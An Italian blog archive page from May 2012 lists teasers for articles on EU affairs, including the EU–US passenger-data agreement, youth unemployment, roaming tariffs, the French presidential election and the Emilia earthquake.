EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Maggio 2012
it

Il Parlamento UE ha dato il via libera al riesame dell’accordo antiterrorismo tra il Vecchio Continente e gli Stati Uniti, con l’obiettivo di far monitorare tutti i dati personali dei passeggeri aerei europei alle autorità statunitensi, attraverso il cosiddetto Pnr, Passenger Name Record. La plenaria a Strasburgo ha espresso 409 si, 226 no e 33 astenuti. Una prima redazione dell’accordo venne bocciata dal Parlamento nel 2007. Quella approvata lo scorso 19 aprile è stata rinegoziata tra Bruxelles e Washington nel 2011, e limiterebbe l’utilizzo dei dati alle indagini su reati gravi

Da quell’11 settembre 2001 tutto è cambiato. Il mondo ha scoperto di avere moltissimi punti deboli, e che ogni sistema può essere attaccato facilmente. Da quella data in poi, la paura si è trasformata in vera psicosi, che col tempo ci ha spinti ad un’ossessiva paranoia sfociante in forme di (...)

it

Il rapporto presentato dalla Direzione Generale Agricola della Commissione europa, che si riferisce all'anno 2011, evidenzia come la crisi non abbia colpito in modo significativo il settore in questione, che dopo i positivi dati del 2010 conferma il trend con percentuali che superano anche le più rosee previsioni.

Agricoltura Balla di fieno tra i campi coltivati I dati parlano chiaro: l’agricoltura sta vivendo un ottimo momento dal punto di vista economico. E questo non riguarda soltanto un particolare Stato o una determinata zona, ma tutti i ventisette stati membri che effettivamente hanno avuto un (...)

it

L'Unione Europea e lo sport: un binomio interessante L’Unione Europea ha ben compreso l’impatto che lo sport, in quanto fenomeno socio-economico, può avere sull’insieme delle politiche europee. Le attività sportive, come riconosciuto dal Consiglio europeo nella dichiarazione del dicembre 2000, hanno un ruolo fondamentale nella quotidianità dei cittadini del vecchio continente. Lo sport può essere un grande mezzo per diffondere nozioni positive quali la pace, la tolleranza, la comprensione reciproca e d’istruzione, in accordo con l’ideale europeo. Come ben sappiamo quando parliamo di sport non ci riferiamo solamente ad un’attività di svago o divertimento ma ci riferiamo ad un fenomeno più ampio, ramificato in profondità nei vari livelli della società, capace di muovere grandi quantità di denaro e di attirare su di sé grandi interessi, non sempre trasparenti. Da ciò nasce la necessità di monitorare costantemente il fenomeno e di confrontarlo con fenomeni quali la pressione commerciale e le esigenze di mercato, la tratta degli esseri umani, il doping, la violenza, la corruzione e il riciclaggio di denaro. Come già sottolineato, l’UE ha afferrato il ruolo essenziale dello sport e l’effetto positivo che può avere sull’insieme delle politiche europee.In quest'ottica, il Consiglio Europeo di giugno 2007 ha definito il mandato della conferenza intergovernativa, con il quale contemplava l’opportunità di inserire una disposizione nel trattato successivo dedicata allo sport. Da queste premesse e soprattutto dalle consultazioni ampliate condotte dal 2005 in particolar modo con i comitati olimpici, le federazioni sportive e gli Stati membri è nato il libro bianco dello sport, ovvero il principale contributo della Commissione europea in materia, tramite il quale, mira a collocare stabilmente la dimensione sportiva nel processo decisionale dell’Unione e ad accrescerne la comprensibilità giuridica in relazione all’applicazione dell’acquis comunitario in materia di sport in maniera tale da favorire il miglioramento della governance in Europa aprendo prospettive future per lo sport su scala europea nel rispetto del principio di sussidiarietà, dell’autonomia delle organizzazioni sportive e del diritto comunitario.

È vero o no che i tifosi in Italia stanno abbandonando gli stadi o c’è dell’altro? Vediamo un po’ di dati…. Il calcio è lo sport per antonomasia nella nostra penisola, ha sempre avuto un rapporto privilegiato con la popolazione del Bel Paese. Nei bar, nelle piazze, su Facebook, tutti ne parlano... (...)

it

Donne che ricoprono alcuni dei più importanti incarichi nelle massime istituzioni europee ce ne sono. Questione chiusa? No di certo. Il problema della parità dei sessi nel processi decisionali, soprattutto in campo economico, esiste ed è reale. Perché deve far notizia che una donna rivesta un ruolo di primissimo livello internazionale? Perché per una donna deve essere, ancora oggi, così difficile provare di essere all'altezza dei signori colleghi uomini? Perché avere una carriera brillante deve voler dire rinunciare ad una famiglia? Scoprite con l'aiuto del neo-Direttore dell'Istituto Italiano di cultura a Bruxelles, Federiga Bindi, quanto lunga è ancora la strada da percorrere per arrivare ad una parità che non sia tale solo in virtù di vuote retoriche sull'argomento.

Viviane Reding Commissario Europeo per la Giustizia, Diritti Fondamentali e Cittadinanza Viviane Reding, Commissario europeo per la Giustizia, Diritti Fondamentali e Cittadinanza, non ci sta. Il percorso dell’Unione Europea verso il raggiungimento di una piena parità di genere, soprattutto (...)

it

Nuovo momento di tensione tra Unione Europea e Svizzera. Questa volta la questione riguarda i permessi di soggiorno da concedere ai cittadini provenienti da alcuni Stati europei, soprattutto dell’Est Europa. La Svizzera ha deciso di dare un taglio all’eccessiva immigrazione e ha ridotto il numero dei premessi. Il nuovo regolamento entrerà in vigore dal primo maggio 2012.

L’Europa e la Svizzera sono nuovamente ai farri corti. L’Esecutivo di Berna ha infatti annunciato che a partire dal primo giorno di maggio del 2012, entrerà in vigore un nuovo regolamento, della durata di un anno, che ridurrà a duemila il numero dei permessi di soggiorno da concedere ai cittadini (...)

it

“Erasmus per Giovani Imprenditori” (Erasmus for Young Entrepreneurs) è un programma di scambio per gli imprenditori e le imprenditrici europei, finanziato dalla Commissione europea e destinato a promuovere ed incrementare l’imprenditorialità e l’internazionalizzazione attraverso un periodo di scambio in altri paesi dell’UE. L’obiettivo è quello di far acquisire le competenze necessarie per avviare e/o gestire con successo una piccola impresa in Europa. I nuovi imprenditori, infatti, avranno la possibilità di apprendere, scambiare conoscenze e idee di business con imprenditori già affermati, dai quali verranno ospitati e con i quali collaboreranno per un periodo che varia da uno a sei mesi. Si tratta di una collaborazione da cui entrambe le parti possono trarre enormi vantaggi, come trovare nuove opportunità di mercato a livello europeo, la possibilità di individuare nuovi partner commerciali e di scoprire modi diversi di fare affari.

In sostanza, si tratta di un programma finanziato dalla Commissione europea e che opera su tutto il territorio dell’Unione. L’ente predisposto alla messa in palio dei posti per la partecipazione all’Erasmus per Giovani Imprenditori è la direzione generale “Imprese e industria” che, conforme ai (...)

it

Il primo turno si è svolto il 22 aprile ed i 10 candidati iniziali si sono ridotti a due, ovvero l'attuale presidente della Repubblica francese Nicolas Sarkozy, appartenente all'UMP, l'Union pour un Mouvement Populairee, e l'oppositore François Hollande, che rappresenta i socialisti francesi. Sullo sfondo c'è un sorprendente risultato del Fronte nazionale guidato da Marine Le Pen, figlia del fondatore del partito stesso Jean-Marie Le Pen nel 1972.

Il 22 aprile 2012 si è svolto il primo turno delle elezioni presidenziali in Francia. Il presidente Sarkozy doveva vedersela con altri 9 candidati, ma gli unici che lo hanno impensierito (e lo impensieriranno) sono François Hollande e Marine Le Pen. Il primo, rappresentante del PS, Parti (...)

it

Sono ben 34 i delfinari presenti in 14 Paesi dell’Unione europea a rischiare la chiusura. A stabilirlo è il rapporto della WDCS - Whale and Dolphin Conservation Society (Società per la conservazione di balene e delfini), realizzato per conto della coalizione europea ENDCAP in collaborazione con la “Born Free Foundation” e recentemente presentato al Parlamento Europeo.

Belgio, Bulgaria, Danimarca, Finlandia, Francia, Germania, Grecia, Italia, Lituania, Malta, Olanda, Portogallo, Spagna e Svezia. Sono questi i 14 Paesi europei finiti nel mirino della WDCS, un’organizzazione che dal 1987 si batte per la conservazione e il benessere di tutti i cetacei, grazie (...)

it

L’Istat ha pubblicato i nuovi dati relativi alla disoccupazione. Nonostante sia trascorso solo un mese, le percentuali sembrano essere aumentate notevolmente rispetto allo scorso febbraio. A risentirne maggiormente sono i giovani compresi tra i 15 e i 24 anni, il cui indice di disoccupazione sale al 35,9%. A preoccupare è anche la possibilità che il tasso di disoccupazione generale in Italia, ora al 9,8%, possa raggiungere la soglia del 10%.

La situazione emersa dalle nuove ricerche condotte dall’Istat appare poco più che preoccupante. Cresce ancora la disoccupazione giovanile, facendo riferimento soprattutto a quelli considerati parte delle forze di lavoro. I dati dell’Istat Istat I dati raccolti dall’Istat mostrano percentuali (...)

it

La Commissione Europea ha lanciato mercoledì 2 maggio una nuova strategia per la tutela dei diritti dei minori nel cyberspazio. Il piano prevede anche la lotta contro gli abusi sessuali online attraverso “soluzioni tecniche innovative” da parte delle forze di polizia continentali

Internet, lo spazio di infinita libertà, può essere un brutto luogo d’incontro per gli utenti, soprattutto per i più piccoli, ancora non in grado di scindere ciò che è bene e ciò che è male. Lo strumento diffusosi così rapidamente e così radicalmente democratizzato ha presentato anche una nutrita lista (...)

it

In una situazione critica come quella che il mondo di oggi sta attraversando, dove si stanno perdendo molte certezze e punti di riferimento in precedenza considerati intramontabili, fare le scelte giuste, capire quale strada intraprendere e costruire il futuro da sempre desiderato, sta diventando sempre più un traguardo difficile da raggiungere. Ciò è vero soprattutto se si ci si trova nella posizione di un giovane di oggi che aspira a realizzare un progetto di vita che possa rispecchiare le proprie capacità, attitudini e passioni.

Quale potrebbe essere il lavoro più adatto? Come sarebbe un’esperienza all’estero? Quale facoltà è quella giusta? Tutte domande che ognuno di noi si è posto o si sta ponendo per cercare di intraprendere e dare un senso al proprio cammino. A venirci in soccorso è lo “Young International Forum”, la (...)

it

La Corte di giustizia risolve l'azione legale tra la società informatica Sas e la società WPL a favore di quest'ultima, accusata di aver utilizzato le funzioni del Sistema Sas. Nello scorso novembre l'avvocato generale Ue Yves Bot si era espresso negli stessi termini.

La Corte di giustizia dell’Unione europea ha sentenziato che le funzioni e il linguaggio di programmazione dei software non sono tutelati dal diritto d’autore, che non protegge “l’idea e i principi di base di un programma, ma soltanto le forme assunte dalla sua espressione”. Risolta la contesa tra (...)

it

La notizia delle percosse subite in carcere dall’ex Primo Ministro dello Stato ucraino ha mandato su tutte le furie molti esponenti delle istituzioni europee che hanno deciso di schierarsi in prima linea al fianco della Tymošenko. La cancelliera Merkel e il Presidente della Commissione Europea, insieme ad altri esponenti dei vertici politici, hanno chiesto al governo di Viktor Yanukovich una maggiore chiarezza e il rilascio immediato della prigioniera. La pena: il boicottaggio da parte delle autorità delle partite degli Europei 2012, in programma proprio in Ucraina e Polonia.

A poco più di un mese di distanza dal fischio d’inizio dei Campionati Europei di calcio 2012, che si disputeranno in Polonia e Ucraina, il caso dell’ex Primo Ministro ucraino Julija Tymošenko rischia di lasciare molti posti vuoti sugli spalti nei settori riservati alle autorità degli Stati (...)

it

Gli euros sono presenti all'evento per discutere di Europa 2.0. Dite la vostra sulle nostre pagine Facebook e Twitter!

Gli Euros @ Liquid.lab per un’Europa 2.0 - Firenze 9 maggio FIRENZE 9-12 maggio 2012: quattro giorni di workshop interattivi, incontri, conferenze e mostre aperti alle idee e ai progetti di chi ha in testa un futuro migliore. Gli Euros sono stati invitati a partecipare a Liquid Lab e ad animare (...)

it

In tutto il nostro continente sono state promosse iniziative volte alla sensibilizzazione e alla riflessione verso argomenti attuali come la crisi economica. Lo scopo è quello di rendere i cittadini partecipi della vita comunitaria, la quale può offrire loro molte opportunità delle quali probabilmente non conoscono nemmeno l'esistenza. La città italiana che darà maggiore spazio a queste iniziative è Parma, che dal 2006 rende omaggio ogni anno alla Festa dell'Europa tramite svariati eventi che tendono ad avvicinare i popoli dell'Unione europea tra loro.

La scelta del giorno non è stata casuale, il 9 maggio è stata infatti spesso una data lieta per i colori europei. Il primo evento che accadde in questo giorno, nell’anno 1950, fu la proposta da parte del ministro degli affari esteri francese Robert Schuman che richiedeva la nascita di un Europa (...)

it

L'Agenzia europea per la sicurezza marittima (EMSA) è chiamata ad assistere la Commissione europea e gli Stati membri nel campo della sicurezza marittima e della prevenzione di attività inquinanti da parte delle navi. A tal fine, l'Agenzia provvede alla corretta applicazione della legislazione europea e promuove la collaborazione tra gli Stati membri. Per farlo ha deciso di ampliare il suo staff dando il via a una serie di tirocini e stage.

Agenzia Europea per la sicurezza marittima nelle acque intenazionali: L’EMSA è un organo specializzato e decentrato dell’Unione europea con lo scopo di migliorare il sistema di sicurezza marittima generale nella comunità. Si adopera inoltre a ridurre il rischio di incidenti marittimi, di (...)

it

Il week end appena conclusosi ha dato un verdetto irreversibile: o si modifica l’Europa o muore. Prima il voto greco, che ha detto con allarmante chiarezza che Bruxelles e l’euro con le regole che ci sono finora ha fallito. Atene ha rigettato la politica fiscale comunitaria e lo ha fatto con la forza dei partiti estremisti. Dopo il cartellino giallo della Grecia, è arrivato quello rosso della Francia e dell’Italia: socialismo e antipolitica hanno stracciato le forze liberali e moderate, chiaro segno della sconfitta della politica del rigore filotedesco. Le elezioni del 6 e 7 maggio questo hanno detto: un rifiuto dei “richiami” stranieri, un risveglio degli ideali della patria e alla terra, un forte anticapitalismo e un rigurgito nei confronti della finanza, artefice de nefasto destino. Il tutto condito da una violenta avversione a danno dei partiti maggiori, proprio come successe negli anni a cavallo delle due guerre. La storia non si ripete mai ma si somiglia spesso, i leader europei sono avvisati

A dieci anni esatti dall’entrata in vigore della moneta unica, si sta chiudendo un ciclo e se ne sta aprendo un altro all’insegna del caos. Il Vecchio Continente si sta sgretolando, e stavolta i colpi ben assestati non vengono dalle banche, ma dai suoi cittadini. L’Europa è stata rifiutata, le sue (...)

it

“Il cane è il migliore amico dell’uomo”. Non si tratta solo di un “detto”, ma di una verità. Le immagini crude e sconcertanti che compongono il video-denuncia della Feder F.I.D.A, presentato lo scorso 19 Aprile alla Commissione Europea dall’On.Le Motti (di cui il nostro blog si è ampiamente occupato), mostrano chiaramente come tale verità non sia ancora entrata a far parte dell’educazione e della mentalità della nostra cara e “vecchia”Europa.

L’interrogazione parlamentare proposta dall’On.Le Andrea Zanoni, Eurodeputato IdV e vice presidente dell’intergruppo “Benessere degli Animali”, che denuncia i maltrattamenti nei canili-lager spagnoli, è sicuramente riuscita a scatenare la reazione della Commissione che ha deciso di approfondire, (...)

it

Il 28 settembre 2012 saranno mandati in orbita altri due satelliti nell'ambito del progetto, i quali si aggiungono ai due precedentemente lanciati nello spazio. Questa piccola costellazione che si verrà a creare servirà ai creatori del progetto per capire il funzionamento preciso della struttura, mentre i paesi europei interessati al programma potranno cominciare a sperimentare nuovi prodotti basandosi sui segnali inviati da "Galileo".

A dare l’annuncio del lancio che avverrà a fine settembre è stato Antonio Tajani, vicepresidente della Commissione europea , insieme a Jean Yves Le Gall, amministratore delegato di Arianespace, la prima compagnia per il trasporto commerciale nello spazio nata nel 1980 in Francia. L’annuncio (...)

it

Far conoscere gli obiettivi e le priorità del Governo Monti in materia di integrazione europea ma anche instaurare un dialogo spesso difficoltoso tra Parlamento e Governo italiani. E’ questo il fine della relazione programmatica del 2012 che, presentata dal Ministro Moavero all’ultimo CdM, verrà poi esaminata dalle due Camere.

Durante il Consiglio dei Ministri tenutosi il 30 aprile scorso, il Ministro degli Affari Europei Enzo Moavero ha esposto la relazione programmatica 2012 riguardante “La partecipazione dell’Italia all’Unione Europea”. Questa informativa è presentata ogni anno al Parlamento italiano dal Governo e il (...)

it

La eHealth Conference si è posta come principale obiettivo quello di eliminare le disuguaglianze sociali, permettendo anche ai territori meno agiati di ricevere assistenza. L'ospedale resta ancora il luogo per eccellenza della cura e della specializzazione, ma è necessario concedere maggiore rilievo anche al territorio. Il Ministro della Salute, Renato Balduzzi, presente alla Conferenza, ha proposto la collaborazione dell'Italia con l'amministrazione americana.

Si è svolta dal 7 al 9 maggio a Copenaghen la “eHealth Conference 2012”. Nel pieno della settimana dedicata alla Sanità elettronica, importanti inziative si sono discusse nel corso della conferenza. Il programma e i temi affrontati eHealth Conference La sanità elettronica può combattere le (...)

it

Una vera e propria cittadella della politica: è questo l’ambiente in cui siamo immersi. Migliaia di metri quadrati di uffici governativi addensati nel nucleo centrale di Berlino. Dall’alto del Reichstag è una meraviglia guardarsi intorno: il moderno si mescola all’antico, tra i colori delle bandiere che sventolano sui tetti di ambasciate e palazzi del potere.

La seconda giornata tra dibattiti accesi e mediazioni, ci regala anche la visita del parlamento tedesco: è qui che risiede la sovranità del popolo, è qui che trova piena realizzazione la democrazia tedesca. Ci troviamo di fronte un edificio imponente con facciate maestose: quattro colonne a (...)

it

Gli ultimi Paesi ad aver subito il declassamento da parte delle agenzie di valutazione sono Francia ed Austria. Sotto la lente d'ingrandimento la Gran Bretagna, possibile prossima vittima. Così cambia l'economia europea ai tempi del rating.

La crisi economica che dal 2008 colpisce l’Europa semina vittime sempre più numerose ed illustri. Accade dunque che, in periodo di recessione, gran parte del potere non solo finanziario ma anche politico e sociale sia delegato a società di rating. L’onnipotenza delle società di valutazione (...)

it

In un recente vertice tra i Ministri degli Affari Esteri si è parlato di fondere la carica di Presidente del Consiglio Europeo e di Presidente della Commissione in un'unica figura, una sorta di “imperatore” eletto dai cittadini europei. Tutto questo secondo il Dailymail porterebbe a una estromissione della Gran Bretagna.

Sul quotidiano inglese conservatore "Daily Mail" è apparsa, nel weekend tra il 5 e il 6 maggio scorso, una notizia alquanto curiosa e che getta qualche ombra sull’Unione Europea e sulla collaborazione tra quest’ultima e il Regno Unito. Secondo il tabloid britannico infatti, durante una riunione a (...)

it

La richiesta è quella di una maggiore attenzione da parte dell'Unione europea verso l'import di pellicce dallo stato nordamericano. Sembra infatti che la maggior parte derivino da animali catturati brutalmente, con metodi rudimentali e dolorosi come le tagliole. Zanoni ha tenuto a precisare che "l'utilizzo di tagliole per catturare animali è vietato nell'Unione europea da circa vent'anni". Insomma una questione sulla quale il deputato per l'Italia dei Valori vuole dei chiarimenti.

Le pellicce catturate con metodo ritenuto legale in Canada ma non in Europa, possono essere vendute liberamente all’interno dell’Unione europea? E’ questa la questione a cui Zanoni vuole trovare una risposta chiara che possa definitivamente far luce su una questione abbastanza delicata come quella (...)

it

È l’e-procurement una delle ultime iniziativa pensate dell’Europa per modernizzazione il sistema degli appalti pubblici europei. “Semplificare il modo in cui viene effettuato l’approvvigionamento, ridurre oneri e costi, aumentare la partecipazione delle PMI e fornire una migliore qualità dei prodotti a prezzi più bassi” sono gli obiettivi derivanti dall’adozione della nuova piattaforma.

Si chiama e-procurement la piattaforma che lo scorso 7 maggio il Commissario europeo Michel Barnier ha presentato a tutti gli eurodeputati. In realtà la strategia era già stata adottata il 20 aprile dalla Commissione europea tramite una comunicazione, intitolata “Una strategia per gli appalti (...)

it

C’è crisi. Crisi economica ma soprattutto crisi sociale: ovunque e in qualunque momento grava su noi tutti come un enorme peso che tende a schiacciarci sempre di più. Debiti e tasse sono all’ordine del giorno e questo scatena reazioni disperate e violente che fanno tornare alla mente le tragiche vicende che l’Italia ha vissuto durante gli anni ‘70, sottoposta alla morsa delle BR e del terrorismo nero.

Equitalia e Agenzia delle Entrate sono sotto attacco, tra minacce di stampo eversivo, avvertimenti, contestazioni e vere e proprie aggressioni. L’episodio più grave si è verificato lo scorso 12 Maggio quando una vera e propria guerriglia urbana si è venuta a sviluppare davanti alla sede di (...)

it

In principio ci furono le proposte della Cancelliera tedesca, Angela Merkel, e dell’ormai ex-Presidente Nicolas Sarkozy, che puntavano sulle liberalizzazioni ed austerità. Proposte inefficaci per la soluzione di un problema sempre più trascurato ed allarmante: in Europa il 23% dei giovani non è utile. L’unica voce fuori dal coro ad oggi è stata quella del Partito dei socialisti europei, Pse, che ha lanciato venerdì 11 maggio la campagna “Il tuo futuro è il mio futuro, una garanzia europea per i giovani subito!”, volta a contrastare nel breve periodo la disoccupazione giovanile UE

5,6 milioni di giovani in Europa non hanno un lavoro. Una cifra impressionante, pari a tutta la popolazione della Danimarca. Ancor più impressionante del 23% di disoccupazione media (in Italia siamo al 36%, pari a 534 mila senza lavoro tra i 15 e i 24 anni), c’è il 50% di Grecia e Spagna, Paesi (...)

it

Dopo aver più volte messo in luce le difficoltà che i giovani affrontano giornalmente muovendosi nel mondo del lavoro, è il momento di parlare di quello che è stato un evento in grado di offrire numerose opportunità. Dall'8 all'11 maggio si è tenuto a Roma lo "Young International Forum" che ha offerto ai giovani la possibilità di conoscere il modo migliore per affrontare il proprio futuro.

Si è svolto dall’8 all’11 maggio, presso “La Pelanda”, nella zona Testaccio a Roma, “Young International Forum”, un evento interamente dedicato ai giovani e alle opportunità da cogliere nel mondo del lavoro. Il programma Young International Forum E’ arrivato il momento per i giovani di conoscere (...)

it

L'Associazione Italiana Alberghi per la Gioventù è un ente istituzionale riconosciuto dall'Onu e membro della Federazione Internazionale degli Ostelli per la Gioventù. Alla base del progetto la necessità di avvicinare i giovani alla cultura.

Nonostante la globalizzazione sia ormai un dato di fatto e le frontiere rappresentino un limite fisico e concettuale ormai sorpassato e dimenticato, si tende ancora a sottovalutare l’importanza ricoperta dalla conoscenza acquisita mediante l’osservazione ’de visu’. Anzi, proprio la diffusione dei (...)

it

Giovani, importanti opportunità di lavoro vi aspettano non solo in Italia, ma anche all’Estero! Le figure professionali richieste sono diverse. Le risorse saranno utilizzate soprattutto nei mesi di Giugno e Luglio. Unico requisito indispensabile: voglia di lavorare.

Il lavoro stagionale è, solitamente, un lavoro a tempo determinato che si svolge in certi periodi dell’anno. Con l’inizio della stagione estiva i lavori offerti di questo tipo sono molti, diversi e soprattutto dispiegati in diverse zone d’Italia e d’Europa. Opportunità di lavoro all’estero: sei (...)

it

Avete mai avuto difficoltà nel trasferirvi in un altro paese dell’UE? Avete mai avuto problemi facendo acquisti online da un altro paese dell'UE? E ancora: che evoluzione auspichereste per l'Unione europea nel prossimo futuro? In che tipo di Unione europea vorreste vivere nel 2020? Queste sono solo alcune delle domande alle quali l’Unione europea vi invita a rispondere entro il 9 settembre 2012, in modo da definire, insieme, l’agenda futura in materia di diritti dei cittadini.

I vostri diritti, il vostro futuro. È questo lo slogan di quella che è stata definita “la più grande consultazione pubblica sui diritti dei cittadini mai condotta nell’Unione, volta a definire l’agenda politica dei prossimi anni e delineare il futuro dell’Europa”. L’iniziativa, della durata di quattro (...)

it

La Commissione, il Consiglio ed il Parlamento europeo hanno raggiunto un accordo che prevede tariffe ben più basse rispetto a quelle che siamo abituati a usare, il quale entrerà in vigore dal 1° luglio. Il tutto non è ancora ufficiale perchè deve essere superato l'ultimo scoglio, ovvero l'approvazione definitiva di Parlamento e Consiglio, il che pare una mera formalità. I membri dell'Europarlamento si sono riuniti a Bruxelles nei giorni scorsi, e la maggioranza ha votato a favore: ci sono stati 578 voti a favore, 10 contrari e 10 astenuti.

Il roaming è stato ciò su cui si sono soffermati gli organi che si sono riuniti a Bruxelles. Con questo termine ci si riferisce all’insieme dei metodi, delle norme e degli apperecchi che rendono possibile il rintracciamento di un determinato terminale e gli permettono di metterlo in comunicazione (...)

it

Tre bambini su quattro navigano sul web e un terzo di essi lo fa attraverso dispositivi mobili. E’ questo il dato preoccupante che ha messo in allarme i vertici di Bruxelles e ha portato alla definizione di nuove strategie il cui obiettivo è quello di creare un web sicuro e adatto ai minori e di fornire ai genitori strumenti di controllo maggiori in grado di combatterei rischi della rete.

Il tema dei minori e della loro tutela sul Web è da sempre al centro dell’attenzione della Commissione Europea. A tal proposito, nella giornata del 2 maggio scorso, l’Esecutivo comunitario, nella figura del suo Commissario per l’Agenda Digitale, Neelie Kroes, ha presentato un nuovo piano rivolto (...)

it

Conoscere persone provenienti da molti Paesi e diversi contesti, vivere un'esperienza di volontariato internazionale, avvicinarsi a culture e popoli lontani. Queste sono solo alcune delle opportunità offerte dai campi di volontariato. Il motto è "deeds not words", fatti non parole.

La crisi economica colpisce duramente anche il mondo del volontariato, rendendo a volte proibitive o snaturando le esperienze low cost organizzate dallo SCI (Servizio Civile Internazionale). La deriva da evitare è che il terzo settore smetta di fungere da strumento, trasformandosi in un fine; (...)

it

Crescita. Questa la parola d’ordine che ha contraddistinto il G8 di Camp David, conclusosi lo scorso 21 Maggio, considerato dai protagonisti come un vero e proprio successo grazie al dialogo che si è venuto ad instaurare tra i partecipanti, nonché per le scelte che sono state assunte e indirizzate sopratutto a superare la crisi economica e a favorire, appunto, la crescita. I leader dei Paesi più industrializzati hanno quindi decretato che sviluppo economico, stabilità e consolidamento fiscale devono andare di pari passo.

Asse Francia-Germania: "il nostro imperativo è favorire la crescita" Sorrisi imprevisti tra Angela Merkel e Francois Hollande che smentiscono le tanto decantate tensioni tra Berlino e Parigi. La cancelliera tedesca ha insistito proprio sul fatto che ’’Francia e Germania non sono su sponde diverse (...)

it

I posti che verranno creati tramite questa inizitiva sono circa cinquemila e le finalità che verranno soddisfatte sono in particolare due: aiutare (ed incoraggiare) i giovani che stanno cercando un'occupazione in un altro paese, che ovviamente dovrà sempre far parte dell'Unione europea, ed agevolare le imprese e le aziende che cercano personale proveniente da paesi esteri. Il progetto rientra nell'ambito della lotta alla disoccupazione giovanile, problema sul quale László Andor, commissario europeo per l'occupazione, l'integrazione e gli affari sociali, ha presentato una serie di proposte atte a contrastarla.

Favorire l’occupazione dei giovani attraverso lo spostamento dei cittadini con un’età compresa tra i 18 ed i 30 anni all’interno dell’Ue. Forse è proprio questo il cavallo di battaglia di questo nuovo progetto presentato dalla Commissione europea. Oltre a rientrare nell’iniziativa "Opportunità per i (...)

it

Ore 4:05 del 20 Maggio 2012. Una scossa di magnitudo 6 della scala Richter, con epicentro a Bologna, fa tremare la terra del Nord Italia provocando morte e distruzione. Le province di Modena e Ferrara e in particolare Finale Emilia e Sant'Agostino sono i centri più colpiti. Sei vittime e circa seimila sfollati rappresentano il bilancio di questa notte da incubo che ha sconvolto l’Italia. Tra la vittime quattro erano operai, la cui morte è stata causata dal crollo dei capannoni in cui stavano lavorando. Le altre due sono donne: un’ultracentenaria di Sant'Agostino e una tedesca di 37 anni che si trovava a Bologna per lavoro.

Contributi mediocri per i terremotati Distruzione, palazzi che crollano e sfollati terrorizzati sono le immagini che da giorni trasmettono i nostri telegiornali. Volti che ricordano quelli del 6 Aprile 2009, quando l’Aquila fu rasa al suolo da un terremoto simile a quello verificatosi pochi (...)

it

Il primato della pressione tributaria va all’Italia: è questo il dato preoccupante diffuso pochi giorni fa dall’Istituto Statistico europeo. Il “Bel Paese” si è guadagnato il gradino più alto del podio con una pressione fiscale superiore al 42% che grava sui contribuenti e che si distanzia di quasi dieci punti percentuali dalla media europea (34%).

Il 21 maggio scorso l’Ufficio Statistico Europeo (Eurostat) ha presentato il proprio rapporto riguardante l’andamento dei sistemi fiscali degli Stati membri dell’Unione Europea, prendendo in particolare considerazione la pressione tributaria sul lavoro. Dai dati è emerso che l’Italia è al primo (...)

it

Lo studio condotto dall’Eurofound, che si occupa fin dal 1975 di studiare le condizioni di vita e di lavoro negli Stati dell’Unione Europea, ha fatto emergere un dato preoccupante: la percentuale di coloro che fanno uso di alcol e droga tra i lavoratori europei è in crescita arrivando a toccare punte del 20%. I Governi sono chiamati ad intervenire per evitare rischi all’intera economia.

In una recente conferenza tenutasi nella città di Strasburgo nei giorni del 14 e del 15 Maggio scorsi, riguardante la prevenzione del consumo di alcol o di droghe sul posto di lavoro, la Fondazione Europea per il Miglioramento delle Condizioni di Vita e di Lavoro (Eurofound) ha presentato i dati (...)

it

Gli argomenti affrontati sono stati molti: si è passati dall'ipotesi di creazione di un accordo di tipo economico tra la Cina e l'Unione europea (che dovrà, dovesse nascere, essere basato sulla reciprocità) alla discussione sui temi inerenti la Grecia, che risulta uno dei paesi più colpiti dalla crisi. Inoltre è stata proposta una significativa modifica del regolamento, in particolare la situazione riguardante il Parlamento europeo, il quale vuole essere più tutelato dal punto di vista giuridico.

La Plenaria si è svolta dal 21 al 24 maggio a Strasburgo, la capitale politica d’Europa nota per essere la sede del Consiglio d’Europa e del Parlamento europeo. Ogni giorno sono state affrontate tematiche diverse, tutte collegate ovviamente ad argomenti d’attualità europea. Lunedì 21 si è partiti (...)

it

Un’iniziativa importante quella del “Giro di vite della Commissione Europea” finalizzata ad informare tutti i cittadini dell’Unione Europea sui prodotti alimentari consigliati come coadiuvanti nella tutela della salute. Le indicazioni, che spesso troviamo sulle etichette dei prodotti alimentari ma anche nelle stesse pubblicità relative alla salute, sono diventate importanti strumenti di marketing che consentono di attirare l'attenzione dei consumatori, i quali si aspettano informazioni accurate sui prodotti che acquistano, in particolare sulle sostanze utili per la salute che i prodotti possono contenere.

La Commissione Europea ha così individuato un elenco di 222 indicazioni consentite: la lista, basata su la consulenza scientifica dell’Autorità europea per la sicurezza alimentare (EFSA), ha l’obbiettivo sia di marcare la validità scientifica degli effetti dichiarati che assicurare il rispetto di (...)

it

Incoraggianti i dati che emergono dal “Rapporto Rapex 2011” presentato a Bruxelles da John Dalli - Commissario europeo per la salute e la politica dei consumatori - e che registrano un calo dei prodotti pericolosi in circolazione nel mercato europeo. Grazie infatti all’adozione di progetti mirati a garantire una maggiore attenzione per la qualità, uniti a un controllo più serrato da parte delle autorità competenti, si è potuti giungere a un’individuazione più tempestiva dei prodotti pericolosi e a una migliore sorveglianza su tutto il mercato, che ha permesso di ridurre il numero dei prodotti notificati.

A mettere a repentaglio la salute e il benessere dei cittadini e a necessitare pertanto di un controllo scrupoloso da parte delle autorità nazionali e internazionali, non sono solo gli alimenti o i farmaci; ad essi si aggiungono, infatti, indumenti, prodotti tessili, giocattoli e veicoli a (...)

it

I giovani delegati italiani hanno consegnato lo scorso 11 Maggio il Final Communiquè, documento finale, (Puebla Agreement) al Presidente Felipe Calderòn Hijonosa nella sua residenza ufficiale di Los Pinos.

Luca Bovone, Cinzia Bianco, Alberta Pelino, Giorgio Giuliani, Andrea Fatale, Mariacristina Paolozzi, Natalia la Torre, tra i 20 e i 25 anni, provenienti da tutti Italia. Backgrounds diversi, anche se accomunati per l’intesse in materia di politica e di economia internazionale e diverse (...)

en

